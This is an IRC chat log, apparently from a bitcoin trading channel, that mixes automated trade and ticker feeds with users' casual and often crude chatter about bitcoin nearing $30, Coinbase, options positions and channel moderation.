[S.MPOE] 25239 @ 0.00064548 = 16.2913 BTC [-] Feb 19 20:31:59 [MPEX] [S.MPOE] 6850 @ 0.00064362 = 4.4088 BTC [-] Feb 19 20:32:02 [MPEX] [S.MPOE] 3000 @ 0.00064 = 1.92 BTC [-] Feb 19 20:35:15 ;;ticker Feb 19 20:35:15 BTCUSD ticker | Best bid: 28.75511, Best ask: 29.00000, Bid-ask spread: 0.24489, Last trade: 29.00000, 24 hour volume: 90437.91974337, 24 hour low: 26.65018, 24 hour high: 29.20000, 24 hour vwap: 27.86604 Feb 19 20:35:19 [MPEX] [O.BTCUSD.C270T] 1000 @ 0.08449039 = 84.4904 BTC Feb 19 20:35:25 so, 30 dollars by end of this week? Feb 19 20:35:35 yep Feb 19 20:36:08 [MPEX] [S.DICE] 400 @ 0.00656793 = 2.6272 BTC [-] Feb 19 20:36:10 [MPEX] [S.DICE] 600 @ 0.00656792 = 3.9408 BTC [-] Feb 19 20:36:11 another psychological barrier, especially after this quick rise from 20 Feb 19 20:36:23 [MPEX] [O.BTCUSD.C260T] 1000 @ 0.11217576 = 112.1758 BTC Feb 19 20:36:28 I the btc-e people were qqing about it Feb 19 20:36:37 lots will be ready to dump I think, assuming 2011 bubble pop Feb 19 20:36:50 thursday night on us Feb 19 20:37:03 coffee break mt gox time Feb 19 20:37:04 wont they dump on 29 then Feb 19 20:37:13 to one up the market Feb 19 20:37:31 [MPEX] [O.BTCUSD.C250T] 1000 @ 0.14430512 = 144.3051 BTC Feb 19 20:37:38 good thing cavirtex has stop-limit orders now.. i can place stop-loss orders and not worry about the big crash Feb 19 20:49:25 29.30 Feb 19 20:49:51 29.343 Feb 19 20:50:10 burn* Feb 19 20:50:39 passed silver? Feb 19 20:50:48 30 today ? Feb 19 20:50:54 could be Feb 19 20:51:22 29.40 for silver Feb 19 20:51:28 soooooo close Feb 19 20:51:49 ping me or mp when it happens Feb 19 20:56:08 knock knock. Feb 19 20:56:34 29.400 Feb 19 20:56:42 CMON Feb 19 20:58:06 ;;ticker Feb 19 20:58:07 BTCUSD ticker | Best bid: 29.22013, Best ask: 29.27000, Bid-ask spread: 0.04987, Last trade: 29.22013, 24 hour volume: 91521.57584689, 24 hour low: 26.65018, 24 hour high: 29.39999, 24 hour vwap: 27.88963 Feb 19 20:58:37 HOW ARE YOU GENTLEMEN Feb 19 20:58:54 BOOM Feb 19 20:58:56 ;;ticker Feb 19 20:58:59 BTCUSD ticker | Best bid: 29.22013, Best ask: 29.35283, Bid-ask spread: 0.13270, Last trade: 29.22013, 24 hour volume: 92639.08839484, 24 hour low: 26.65018, 24 hour high: 29.50000, 24 hour vwap: 27.90838 Feb 19 21:01:27 [MPEX] [O.BTCUSD.C250T] 1000 @ 0.14597395 = 145.974 BTC [+] Feb 19 21:03:31 usagi Feb 19 21:03:41 usagi Feb 19 21:03:42 usagi Feb 19 21:05:44 ;;ticker Feb 19 21:05:44 BTCUSD ticker | Best bid: 29.51000, Best ask: 29.55000, Bid-ask spread: 0.04000, Last trade: 29.55000, 24 hour volume: 92840.17098132, 24 hour low: 26.65018, 24 hour high: 29.55000, 24 hour vwap: 27.91427 Feb 19 21:05:50 30 Feb 19 21:05:54 is coming Feb 19 21:06:29 it just doenst wanna take a break :) Feb 19 21:07:40 umm Feb 19 21:07:50 so it reached parity today? Feb 19 21:07:53 with silver?? Feb 19 21:07:55 yes Feb 19 21:07:59 blew past it Feb 19 21:09:02 my quote for silver is 29.460 aks curretnly Feb 19 21:09:05 ask Feb 19 21:09:20 well brb Feb 19 21:10:51 [BTCTC] [GSDPT] 2 @ 0.0064 = 0.0128 BTC [+] Feb 19 21:13:35 whats silvers spot price Feb 19 21:13:56 http://www.kitcosilver.com/charts/24hoursspot.html Feb 19 21:14:21 silver tanked O_O Feb 19 21:19:28 ;;bc,24hprc Feb 19 21:19:30 27.90 Feb 19 21:20:00 ;;ticker Feb 19 21:20:00 BTCUSD ticker | Best bid: 29.27001, Best ask: 29.39999, Bid-ask spread: 0.12998, Last trade: 29.27001, 24 hour volume: 92826.40266463, 24 hour low: 26.65018, 24 hour high: 29.55000, 24 hour vwap: 27.92089 Feb 19 21:21:45 [MPEX] [S.DICE] 2000 @ 0.00674199 = 13.484 BTC [+] Feb 19 21:22:28 [HAVELOCK] [SDICE] 2 @ 0.691 = 1.382 BTC [+] Feb 19 21:22:29 [HAVELOCK] [SDICE] 18 @ 0.69 = 12.42 BTC [-] Feb 19 21:33:29 ;;ticker Feb 19 21:33:30 BTCUSD ticker | Best bid: 29.31001, Best ask: 29.48987, Bid-ask spread: 0.17986, Last trade: 29.48987, 24 hour volume: 93237.04374245, 24 hour low: 26.65018, 24 hour high: 29.55000, 24 hour vwap: 27.93089 Feb 19 21:45:00 as if it wanted to go 30 tonight Feb 19 21:45:10 fuck it Feb 19 21:45:13 lets go to 50 Feb 19 21:45:23 thank you coinbase Feb 19 21:45:56 every afternoon they email my friend saying they sold out all their coins available for the day. Feb 19 21:46:17 ;;ticker Feb 19 21:46:17 BTCUSD ticker | Best bid: 29.45001, Best ask: 29.48999, Bid-ask spread: 0.03998, Last trade: 29.48999, 24 hour volume: 94344.71113133, 24 hour low: 26.65018, 24 hour high: 29.55000, 24 hour vwap: 27.95419 Feb 19 21:46:26 why can't they just raise price? Feb 19 21:46:53 if i understand correctly, they follow mtgox? Feb 19 21:47:18 they do Feb 19 21:48:26 then they end up buying btc on mtgox at higher price, no? Feb 19 21:48:47 strange Feb 19 21:49:27 well Feb 19 21:49:37 they are selling out every day Feb 19 21:50:44 yeah they lose a little on each sale but they make it up on volume Feb 19 21:51:38 how can they "make it up on volume"? Feb 19 21:51:58 ;) Feb 19 21:52:46 lol Feb 19 21:52:51 what's the deal with coinbase anyway Feb 19 21:53:07 the only btc thing to take ycombinator funds, the only btc thing to sorta suck ? Feb 19 21:53:12 http://ca.news.yahoo.com/meteorite-rush-begins-russian-scientists-fragments-111415119.html Feb 19 21:53:23 forget about bitcoins, lets look for that meteorite and get rich!! Feb 19 21:53:44 meteorically so. Feb 19 21:53:57 ;;seen diablo-d3 Feb 19 21:53:57 diablo-d3 was last seen in #bitcoin-assets 15 hours, 18 minutes, and 44 seconds ago: its a cat grin Feb 19 21:54:10 prolly diablo went to look for it Feb 19 21:54:22 its in russia.. we gotta wear sum coats Feb 19 21:54:45 sum coats? Feb 19 21:54:49 "we aren't an exchange. we're a sucky web wallet that keeps your private key serverside. but no one uses us as a wallet they use us as an exchange for a certain type of customer. but really we're a wallet." Feb 19 21:55:08 russian winter is quite nasty Feb 19 21:55:30 if we look for the meteorite we may stay there for quite a while.. Feb 19 21:55:31 pigeons? Feb 19 21:55:40 that's what coinbase always says Feb 19 21:56:49 okay. but that isn't helping me wrap my head about that mtgox-price-based business model Feb 19 21:56:58 They are reddit's preferred purchasing method Feb 19 21:57:07 nuff said Feb 19 21:57:10 so for idiots. Feb 19 21:57:22 yes Feb 19 21:57:28 people that are buying coins at $29.50 Feb 19 21:57:35 insteady of $2.90 Feb 19 21:57:51 kids with braces Feb 19 21:57:54 for example, i know how i sell MPBPT practically for free and still end up with profit. but i somehow don't get this. Feb 19 21:58:01 they are "growth hackers" whatever that is Feb 19 21:59:22 pigeons totally. Feb 19 21:59:25 ehem. 5 years later.. people are buying coins at 2950 dollars, instead of 290 dollars Feb 19 21:59:29 kids with braces Feb 19 21:59:36 :D Feb 19 21:59:41 jurov: what Feb 19 22:00:07 Bugpowder: it's wiser to buy coins at 29.50 than 129.50 Feb 19 22:00:23 ohh Feb 19 22:00:26 someone mentioned ma point Feb 19 22:01:48 dat braces kid will have gold teeth sooner or later. Feb 19 22:01:52 Well, I hope they are all quite wise Feb 19 22:01:55 Diablo-D3 haven't you get meteorite rush? Feb 19 22:01:56 buying at 29.5 Feb 19 22:01:59 prolly best to just take the braces off. Feb 19 22:02:07 jurov: no? Feb 19 22:02:15 those have no value to me Feb 19 22:02:37 rob the bitcoin store tell em make me a grill Feb 19 22:03:56 [MPEX] [S.MPOE] 10000 @ 0.00063879 = 6.3879 BTC [-] Feb 19 22:03:57 [MPEX] [S.MPOE] 1004 @ 0.00063878 = 0.6413 BTC [-] Feb 19 22:04:36 ;;ticker Feb 19 22:04:37 BTCUSD ticker | Best bid: 29.30301, Best ask: 29.47999, Bid-ask spread: 0.17698, Last trade: 29.30301, 24 hour volume: 94559.98577758, 24 hour low: 26.65018, 24 hour high: 29.55000, 24 hour vwap: 27.96753 Feb 19 22:04:50 volume is good Feb 19 22:05:27 wheres that gigantic candle :) Feb 19 22:07:17 http://4.bp.blogspot.com/-Wb5fuSmJTuQ/UQmCRnFIMCI/AAAAAAAAQmY/eSRAkiBGlYM/s1600/Green-candle3.jpg Feb 19 22:08:40 Cu lights green Feb 19 22:08:41 burns Feb 19 22:09:53 *throws burning potssium in* Feb 19 22:10:02 potassium Feb 19 22:10:29 [BTCTC] [S.MPOE-PT] 14 @ 0.00067 = 0.0094 BTC [-] Feb 19 22:10:32 The candle is on the 1 day Feb 19 22:10:56 Coinbase Re-fucked me. The pending transactions I had disappeared from my account history Feb 19 22:11:08 so i'm down $1300 and no record of the purchase except my bank acct Feb 19 22:11:12 fuckin A Feb 19 22:12:36 then go talk to your bank? Feb 19 22:14:38 BItcoinQT v0.80 is using 720% of my CPU Feb 19 22:14:41 very impressive Feb 19 22:15:35 lol Feb 19 22:18:07 this is scary Feb 19 22:18:16 two FB threads about buttcoin lately Feb 19 22:19:20 we need an apocalypse nao Feb 19 22:19:57 51% asicminer panic, devs acting against dice, anything Feb 19 22:20:00 the ltc people over at btc-e are predicting a massive sell off tomorrow Feb 19 22:20:43 like, everyone dumping btc in favor of ltc? Feb 19 22:20:56 they are saying sell btc now, crash incoming Feb 19 22:21:23 I'm trying to get my 50BTC first Feb 19 22:21:23 not necessarily in favour of ltc, but they like ltc who who knows Feb 19 22:21:32 since it's work $5 more than I paid for it then. Feb 19 22:23:45 last s.mpoe price 0.00066666 heh Feb 19 22:23:47 who cares what ltc people think Feb 19 22:23:48 nobody Feb 19 22:25:43 fuc yes Feb 19 22:26:18 Lets do this Feb 19 22:26:22 $33 Feb 19 22:26:24 or bust Feb 19 22:26:32 you mean 3000 Feb 19 22:26:45 well Feb 19 22:26:45 I mean by Friday Feb 19 22:26:50 mhm Feb 19 22:26:54 33 is a little too rich Feb 19 22:27:11 i mean, right now the orders look like its smooth sailing if we break 30 Feb 19 22:27:22 but theres gonna be resistance futher, Feb 19 22:27:39 yes of course Feb 19 22:28:20 30 is the conservative target Feb 19 22:28:24 31.. optimistic, 32, thats pushing it Feb 19 22:28:32 33.. well. shit Feb 19 22:28:38 32 Feb 19 22:28:44 31.9.09 Feb 19 22:28:45 ;;ticker Feb 19 22:28:46 BTCUSD ticker | Best bid: 29.62001, Best ask: 29.63001, Bid-ask spread: 0.01000, Last trade: 29.63001, 24 hour volume: 95220.61306534, 24 hour low: 26.65018, 24 hour high: 29.65000, 24 hour vwap: 27.99449 Feb 19 22:28:48 31.909 Feb 19 22:54:54 ;;ticker Feb 19 22:54:54 BTCUSD ticker | Best bid: 29.36903, Best ask: 29.40000, Bid-ask spread: 0.03097, Last trade: 29.40000, 24 hour volume: 95677.19212308, 24 hour low: 26.65018, 24 hour high: 29.65000, 24 hour vwap: 28.01492 Feb 19 22:59:29 ;;ticker Feb 19 22:59:30 BTCUSD ticker | Best bid: 29.31596, Best ask: 29.36020, Bid-ask spread: 0.04424, Last trade: 29.31700, 24 hour volume: 95898.29879253, 24 hour low: 26.65018, 24 hour high: 29.65000, 24 hour vwap: 28.01890 Feb 19 22:59:38 oops lol Feb 19 23:00:06 twas muscle memory Feb 19 23:00:21 lol Feb 19 23:09:35 [MPEX] [S.MPOE] 1177 @ 0.00064 = 0.7533 BTC [+] Feb 19 23:09:37 [MPEX] [S.MPOE] 1400 @ 0.0006507 = 0.911 BTC [+] Feb 19 23:09:43 [MPEX] [S.MPOE] 7900 @ 0.00065582 = 5.181 BTC [+] Feb 19 23:09:53 [MPEX] [S.MPOE] 9323 @ 0.00065828 = 6.1371 BTC [+] Feb 19 23:17:18 [MPEX] [S.MPOE] 636 @ 0.00063878 = 0.4063 BTC [-] Feb 19 23:17:20 [MPEX] [S.MPOE] 3300 @ 0.00063878 = 2.108 BTC [-] Feb 19 23:17:22 [MPEX] [S.MPOE] 1458 @ 0.00063859 = 0.9311 BTC [-] Feb 19 23:26:13 lol Feb 19 23:26:13 (13:25) < btc123> MPEX is stupid. he should price membership in fiat, not BTC.... whats gonna happen when BTC=$1000 each? $40,000 to get an account and trade?. mira popescecu is a huge egomanic idiot Feb 19 23:26:24 (13:25) < btc123> i'm gonna make btc123EX just to spite him. membership == free Feb 19 23:26:27 (13:25) < btc123> fuck mpex Feb 19 23:26:50 he also said that they're making a BTC ETF for the QQQ too, so lol Feb 19 23:27:10 what chan is this from Feb 19 23:27:21 otc Feb 19 23:27:59 QQQ? what's that? Feb 19 23:28:05 otc is deprecated Feb 19 23:28:14 nasdaq etf Feb 19 23:28:42 (12:32) < btc123> its mainstream now. the NASDAQ is adding a Bitcoin ETF next week... buy buy buy Feb 19 23:28:48 Lol Feb 19 23:28:51 yeah fucking right Feb 19 23:29:01 (12:32) <+mod6> haha, no way. Feb 19 23:29:20 We would gap up to $100 / BTC Feb 19 23:29:53 he's just trollin Feb 19 23:30:07 ...he certainly didn't cite anything Feb 19 23:30:54 (13:29) < btc123> it will be ready by april 1 Feb 19 23:31:01 (13:30) < btc123> its going to be called FMPEX (fuck mpex) Feb 19 23:31:05 there should be a bbet on this Feb 19 23:31:09 ah undernet. -G(announce@undernet.org)- What is a TROLL? The UnderNet User-Committee Class Project presents our LIVE Q/A & CHAT session. Feb 19 23:33:23 otc is deprecated << this. Feb 19 23:33:44 and im gonna rethink the no ban policy here. Feb 19 23:33:55 its this is getting out of hand at a times. Feb 19 23:34:05 i wish it entered into record that the 123th or so idiot doing "an exchange" just "to spite me" is very effective. i am all spited and everything. Feb 19 23:34:06 truffles? Feb 19 23:34:24 yea, and a couple of others along Feb 19 23:34:24 kakobrekla what's wrong with people fillingtheir ignore lists ? Feb 19 23:34:48 i mean other than other people discussing with the idiots so you end up with a long convo in which someone is apparently talking to themself. Feb 19 23:36:20 mircea_popescu it helps noone to have some strange and confusing echoes on the chan Feb 19 23:36:35 add useless to that Feb 19 23:36:47 peeps are selling options on -otc for prices 3x C350N .. i couldn't resist Feb 19 23:36:57 lol Feb 19 23:38:06 jurov lol. Feb 19 23:38:13 it's maybe out of spite :D Feb 19 23:38:29 [MPEX] [S.MPOE] 10400 @ 0.00063859 = 6.6413 BTC [-] Feb 19 23:39:06 unrelatedly, i absolutely LOVE people trying to escalate a request for "help" whereby they didn't read the faq Feb 19 23:39:31 into a thread of dicussion where they inform the presumably mouth-agape site ops of how the world works. Feb 19 23:39:52 what was it this time Feb 19 23:39:52 [22:32] mpex prices page hurts my brain to look at Feb 19 23:40:15 ^they don't read faq since their brain hurts Feb 19 23:40:22 y u skip my cynical comment Feb 19 23:40:59 heheh Feb 19 23:41:07 anywho cant wait for btc123 securities exchange Feb 19 23:41:09 kakobrekla just some knowitall dood, explaining why intrade system " would seem to have all of Feb 19 23:41:09 the advantages and none of the disadvantages of the system you've selected" Feb 19 23:41:23 completely blind to the fact that on such a system you can't buy more than what someone sells/etc Feb 19 23:41:25 ah that thing, again. Feb 19 23:41:40 and obviously not being aware whart it's called. he has some bullshit (self developed ?) examples Feb 19 23:42:42 basically a horde of maybe 1-500 mn people are marginally self aware enough to use a spoon (but not a fork) and windows, and they're running around explaining why everything should be made out of spoons running windows. Feb 19 23:42:53 meanwhile the real world happily churns away on linux, using forks and knives. Feb 19 23:43:00 and the two shall never meet. Feb 19 23:43:02 the end. Feb 19 23:43:09 not to mention the billions still using a pair of sticks to eat Feb 19 23:43:25 dub omg stop puncturing my well constructed analogies Feb 19 23:44:03 lol\ Feb 19 23:51:20 ;;ticker Feb 19 23:51:20 BTCUSD ticker | Best bid: 29.03000, Best ask: 29.09839, Bid-ask spread: 0.06839, Last trade: 29.23900, 24 hour volume: 98549.45901109, 24 hour low: 26.65018, 24 hour high: 29.65000, 24 hour vwap: 28.08445 Feb 19 23:55:06 -otc makes my head hurtmore than mpex any day Feb 19 23:56:27 I'd say we are due for another leg up... Feb 19 23:56:52 It's been over an hour Feb 19 23:57:10 fair enough haha Feb 19 23:57:18 oh wait that didnt come out right. Feb 19 23:57:20 Third leg up Feb 19 23:57:26 then there is this gem: Feb 19 23:57:27 (13:52) <+FonziScheme> maybe what's bothered me is that I thought this "1`000" meant 1.000 (one) , maybe it means 1,000 (thousand)? http://mpex.co/?mpsic=O.BTCUSD.P300T Feb 19 23:57:54 all this dudes hatred over a simple grave. Feb 19 23:58:23 actually it looks i put a proverbial bug into someone's head Feb 19 23:58:50 haha. you have much more patience than i do :D Feb 19 23:59:17 lol but when i said "if you can raise thousands of btcs like mpoe does... no problem" looks like he lost interest Feb 19 23:59:28 i'll leave it there Feb 19 23:59:36 haha. werd. Feb 19 23:59:48 the pocket money mom gives him isnt goign to cover that Feb 20 00:04:37 lol i like how Bugpowder's predictions match his book Feb 20 00:05:02 1`000 totally means 1. Feb 20 00:15:14 ? Feb 20 00:17:12 is not like it put your name fwd :) Feb 20 00:17:23 s/it/i Feb 20 00:18:29 yes this place is horrible. Feb 20 00:18:46 terrible is what it is. Feb 20 00:19:23 you should just get some bitcoins dude Feb 20 00:20:04 ;;seen smickles Feb 20 00:20:04 smickles was last seen in #bitcoin-assets 1 week, 3 days, 20 hours, 9 minutes, and 18 seconds ago: pong Feb 20 00:20:10 ;;bc,stats Feb 20 00:20:12 Current Blocks: 222063 | Current Difficulty: 3651011.630693214 | Next Difficulty At Block: 223775 | Next Difficulty In: 1712 blocks | Next Difficulty In About: 1 week, 3 days, 10 hours, 32 minutes, and 11 seconds | Next Difficulty Estimate: 4099609.80093 | Estimated Percent Change: 12.28696 Feb 20 00:20:31 by X.IDIFF Feb 20 00:21:35 then spectate, dont speak. Feb 20 00:22:10 cause you are annoying to people Feb 20 00:22:47 why should everyone else have to work to stop being annoyed by you Feb 20 00:23:00 if enough people ignore you, means its ripe for ban. Feb 20 00:23:05 when you could just not annoy people Feb 20 00:24:09 doesnt mean you should pour shit on the table Feb 20 00:24:34 JWU_42 i saw dat! Feb 20 00:24:43 i have a feeling you guys are talking to someone I already have ignored Feb 20 00:24:51 i had you on ignore for a day or two Feb 20 00:24:56 until diablo started to talk to himself Feb 20 00:24:57 truffles: have you tried #bitcoin-otc? they encourage retardation Feb 20 00:25:00 for extended period of time Feb 20 00:25:49 no when you say it it gives the person valuable feedback about his douchery Feb 20 00:26:30 can I ask who smickles is? he gets a lot of ";;seen" Feb 20 00:26:50 he is a offline mpex broker Feb 20 00:26:53 something like that Feb 20 00:27:18 thx Feb 20 00:28:01 dub is funny Feb 20 00:28:19 your face is funny Feb 20 00:28:31 NO U! Feb 20 00:28:40 truffles u like bitcoins Feb 20 00:29:01 i seriously thought you were the biggest bitcoin fanboi in the channel Feb 20 00:29:28 you sure act like one Feb 20 00:29:29 truffles all of these guys are trolls Feb 20 00:29:47 gals too Feb 20 00:30:28 bring your light to me truffles Feb 20 00:30:34 i can be trusted Feb 20 00:31:09 truffles this chan went a days without a word and we like it that way. Feb 20 00:31:27 -a Feb 20 00:31:39 cant type for shit. Feb 20 00:31:50 [MPEX] [S.MPOE] 16777 @ 0.00065828 = 11.044 BTC [+] Feb 20 00:31:53 [MPEX] [S.MPOE] 7123 @ 0.00066664 = 4.7485 BTC [+] Feb 20 00:32:19 unfortanetly it also allows noise to pass Feb 20 00:35:27 no! Feb 20 00:35:40 one does not simply /part the channel Feb 20 00:36:36 did you just learn about bitcoin? Feb 20 00:36:53 that's neat Feb 20 00:37:15 you mean the CBS show the good wife? Feb 20 00:37:29 the episode from 2011 or early 2012 right? Feb 20 00:37:31 lol people stil lremember that? Feb 20 00:37:37 2011 Feb 20 00:37:38 i remeber the timeframe Feb 20 00:37:46 that was fucking hilarious Feb 20 00:37:50 everyone was like Feb 20 00:37:52 127.09.01 Feb 20 00:37:54 ITS GOING TO MAKE BITCOIN FAMOUS Feb 20 00:37:56 satoshi's ip Feb 20 00:38:01 it did _noootthiiiinnnnggg_ Feb 20 00:38:10 eh? Feb 20 00:38:14 jcpham: home sweet home Feb 20 00:38:15 it brought us truffles Feb 20 00:38:22 you call that nothing? Feb 20 00:38:24 Diablo-D3 is a true hater truffles Feb 20 00:38:26 watch yourself Feb 20 00:38:34 kakobrekla: like I said, it did nothing Feb 20 00:39:15 to what i can measure, its a negative influence. Feb 20 00:40:50 negative and positive have no bearing on the inevitable Feb 20 00:42:03 jcpham just dont shut dont the matrix just yet Feb 20 00:42:36 [HAVELOCK] [SDICE] 6 @ 0.74399999 = 4.464 BTC [+] Feb 20 00:42:41 the adoption of philosophical principles long forgotten keep the matrix churning Feb 20 00:42:47 god is the blockchain Feb 20 00:43:41 good drives adoption just like bad, either can be excluded Feb 20 00:43:53 principles such as morals. which are a toin coss at best Feb 20 00:44:14 that was 4 lines of atlas chat Feb 20 00:44:19 g'night muthafuckas Feb 20 00:44:42 jcpham == atlas Feb 20 00:44:55 pretty sure i just proved it Feb 20 00:45:27 this is why we can't have nice rota's Feb 20 00:45:52 i can be much worse Feb 20 00:46:01 glad im out of the reasoning. Feb 20 00:46:54 truffles i know how to scam mpex Feb 20 00:47:02 100btc and I'll teach you Feb 20 00:47:11 rofl Feb 20 00:47:33 oh well i'm not interesting Feb 20 00:48:22 sadly you are not interesting to anyone Feb 20 00:48:23 STACK IS TEH INNOCENT! Feb 20 00:48:30 [HAVELOCK] [SDICE] 2 @ 0.74399999 = 1.488 BTC [+] Feb 20 00:48:31 mircea_popescu calls me names and treats me poorly all the time Feb 20 00:48:50 one meal a day. Feb 20 00:48:53 much like EskimoBob adding _afk to his nick, not a single fuck given Feb 20 00:49:32 what exactly truffles did? Feb 20 00:49:54 yeah EskimoBob_afk cut that shit, noone gives afk fuck. Feb 20 00:49:57 decreased SNR Feb 20 00:50:20 this is the fourth reich! Feb 20 00:50:34 :) Feb 20 00:50:56 i consider him harmless.. truffles is like white noise, almost soothing Feb 20 00:50:59 ya srs EskimoBob_afk, stop afk polution Feb 20 00:50:59 i'm only here to start shit and cause fights Feb 20 00:51:07 idontknowwhatimdoing.jpg Feb 20 00:51:08 unlike EskimoBob_afk Feb 20 00:51:28 that's like loud static Feb 20 00:51:34 jurov: we must preserve the purity of -assets Feb 20 00:51:52 the machines are comming. Feb 20 00:52:14 hang out here long enought truffles and someone might impersonate you Feb 20 00:52:26 maybe we'll get a truffles` Feb 20 00:52:46 there's a jcpham` running around scammin folks i here Feb 20 00:52:50 *hear Feb 20 00:53:03 yeah. and 1`000 is a scammer, too Feb 20 00:53:21 /nickserv info jcpham` isn't me Feb 20 00:53:22 milk is clean. Feb 20 00:53:28 and milk` Feb 20 00:53:34 milk is murder Feb 20 00:53:46 i wonder if dub` is taken Feb 20 00:54:23 what youtube video Feb 20 00:54:27 we first impersonate, then expersonate. Feb 20 00:54:43 someone fed you some bad intel my friend Feb 20 00:55:04 irc is an organized disinformation campaign Feb 20 00:55:42 i declined because i am unqualified Feb 20 00:55:55 plus i couldn't find enough naked chicks Feb 20 00:56:20 no naked chicks on rota duty? Feb 20 00:56:26 kinda hard then Feb 20 00:56:28 not yet... Feb 20 00:56:58 here you go https://www.youtube.com/watch?v=NDNvBidOvKg Feb 20 00:57:34 i feel better about myself for watching that Feb 20 00:59:19 you are american, don't you? need warning labels on everything Feb 20 00:59:49 truffles warning, its a youtube link. Feb 20 01:00:49 up to you to interpret really Feb 20 01:01:29 PARENTAL ADVISORY: IMPLICIT CONTENT Feb 20 01:01:50 Don't forget, S.MPOE/S.DICE/S.BBET passthroughs available on BTCT.co Feb 20 01:01:58 +b jcpham Feb 20 01:02:23 Namworld: got anything to make my penis bigger? Feb 20 01:02:43 microscope? Feb 20 01:02:46 maybe a nigerian lottery windfall? Feb 20 01:02:53 No, but please browse my spam folder. You might find happiness there. Feb 20 01:03:13 Namworld: I assumed this channel was your spam folder Feb 20 01:03:27 no, that's #bitvps Feb 20 01:03:39 I think he's right Feb 20 01:04:03 All channels seem like my spam folders Feb 20 01:04:28 world is my spam folder..lalala... Feb 20 01:06:27 Wait, is dub a hater or something? I've been catching up on the read a bit. Feb 20 01:06:35 kakobrekla i understand you are looking for someone to blame.... Feb 20 01:06:55 in these times of stress make it...santori time Feb 20 01:07:02 seems that #bitcoin-assets got into cantankerous mood.. let's move on Feb 20 01:07:16 [MPEX] [S.DICE] 1000 @ 0.00656793 = 6.5679 BTC [-] Feb 20 01:07:21 [MPEX] [S.DICE] 860 @ 0.00656792 = 5.6484 BTC [-] Feb 20 01:07:23 [MPEX] [S.DICE] 950 @ 0.0065539 = 6.2262 BTC [-] Feb 20 01:07:38 ;;slap assbot Feb 20 01:07:51 bot bdsm... now that's something Feb 20 01:07:52 that helps. Feb 20 01:07:54 mannequin Feb 20 01:08:50 kakobrekla, how much is assbot? wanna have some porn Feb 20 01:09:56 how much what Feb 20 01:10:46 i'll tell it bluntly... does assbot offer escort service? Feb 20 01:11:21 Well it's an ass with two legs. What was it made for do you think? Feb 20 01:11:22 money talks. Feb 20 01:11:30 See Feb 20 01:11:39 ;;seen smickles Feb 20 01:11:39 smickles was last seen in #bitcoin-assets 1 week, 3 days, 21 hours, and 54 seconds ago: pong Feb 20 01:12:22 so, sweet assbot, how much are you tonight? Feb 20 01:12:36 *for Feb 20 01:12:45 depends who the client is. Feb 20 01:13:28 i thought you knew me, i'm taking care and feeding you with delicious transactions Feb 20 01:14:28 ah, for you, number of users in chan of btc. Feb 20 01:15:09 EVERYONE LEAVE WEHAVEA FIRE RUN FOR YER NICKS Feb 20 01:15:46 ;;ticker Feb 20 01:15:46 BTCUSD ticker | Best bid: 29.16737, Best ask: 29.21862, Bid-ask spread: 0.05125, Last trade: 29.16737, 24 hour volume: 100118.61733733, 24 hour low: 26.71812, 24 hour high: 29.65000, 24 hour vwap: 28.13348 Feb 20 01:15:54 We are crashing!!! Feb 20 01:16:00 Upwards :D Feb 20 01:16:34 some gentlemen seem to be completely unperturbed by the drama..or the fire Feb 20 01:16:48 Yeah... beware... you see the sky under you and fall upward... Feb 20 01:17:02 but after a while you wake up. Then youo're back on the ground. Feb 20 01:17:51 Dreams vanish into smoke, like all that credit card leveraged BTC investment you did, not to count your retirement savings. Feb 20 01:18:33 Oh, I am quite satisfied with the situation. I was wondering how it felt to burn alive. Feb 20 01:18:46 we havent crossed 30 yet? Feb 20 01:18:54 We're getting there Feb 20 01:20:26 I think I farted, a little. Feb 20 01:23:20 ... I'm sure jurov liked it. Feb 20 01:23:59 last sparks of jurov's life vanish like credit card leveraged BTC investment, while everybody is looking with amusement Feb 20 01:25:04 what did jurov do now? Feb 20 01:25:35 went on a date with assbot. Feb 20 01:26:15 which side up ? Feb 20 01:30:48 I find this offensive Feb 20 01:32:26 yeah, i don't see how a cunt wouldn't be offended by that.. :b (i didn't even click on that link) Feb 20 01:32:44 oww, my feels Feb 20 01:32:59 was too perfect and you set yourself up for it :b Feb 20 01:33:23 I may have to buy a house to cheer me up Feb 20 01:33:25 Tokyo 8:30am Mt Gox opening !! Feb 20 01:33:40 30$ in the next 2h Feb 20 01:39:44 I sure hope so Feb 20 01:40:02 I fully capitiualted into a long position Feb 20 01:40:10 one might say I recapitulated Feb 20 01:40:21 lol Feb 20 01:40:23 decapitulated Feb 20 01:40:33 so then it goes down now ? Feb 20 01:40:54 after 29.7 Feb 20 01:40:58 it goes to 2 Feb 20 01:41:13 .97 Feb 20 01:41:13 nah , support is now at 3 Feb 20 01:41:27 actually it goes to 2`97, everone's happy Feb 20 01:41:32 Well... Feb 20 01:41:36 actually Feb 20 01:41:40 2.97 would be sweet Feb 20 01:41:43 wait Feb 20 01:41:46 wut Feb 20 01:42:04 lmao Feb 20 01:42:04 its all about the maff Feb 20 01:42:12 maff is backing this drama! Feb 20 01:42:15 Just finished a lot of maff Feb 20 01:42:18 paper resubmitted Feb 20 01:42:21 time for a drink Feb 20 01:42:30 time for an auction Feb 20 01:42:32 wish me luck Feb 20 01:42:34 So... you went long Bugpowder? Feb 20 01:42:36 time for a RALLY Feb 20 01:42:39 yess Feb 20 01:42:43 =/ Feb 20 01:42:47 I'm still short Feb 20 01:42:52 The 250s were selling for less than exercise Feb 20 01:43:00 at spot Feb 20 01:43:09 I closed 2/3 of the short Feb 20 01:43:15 reopened 1/3 of it Feb 20 01:43:19 the left it open Feb 20 01:43:26 and now went long Feb 20 01:43:33 wide straddle Feb 20 01:43:37 I'm just sad I didn't wait till after the 22th to get puts... seems we'll still be going up for a while. Feb 20 01:43:40 like Feb 20 01:43:57 If we crash to 26.... I am fucked Feb 20 01:44:36 Before the 22th? Feb 20 01:44:39 yes Feb 20 01:44:45 I think we won't get that Feb 20 01:44:48 about 29.30 I make money on the calls Feb 20 01:44:52 above 2930 Feb 20 01:44:53 Maybe next month tho Feb 20 01:45:16 good luck Feb 20 01:55:20 really, white noise Feb 20 01:57:31 i doubt. you have seen yourself her suffocating people whith her ass and not caring a bit Feb 20 01:57:47 anyway, what kind of care do you need? Feb 20 02:01:17 left you unfinished? Feb 20 02:01:26 yeah, that's unconvenient. Feb 20 02:04:48 ;;ticker Feb 20 02:04:49 BTCUSD ticker | Best bid: 29.38401, Best ask: 29.41569, Bid-ask spread: 0.03168, Last trade: 29.41569, 24 hour volume: 99720.56117272, 24 hour low: 26.80000, 24 hour high: 29.65000, 24 hour vwap: 28.18580 Feb 20 02:06:42 I didn't understand anything of whatever that talk was about. Me thinks if the idea that there's no girls in Bitcoins was dropped, maybe all what was said would suddenly 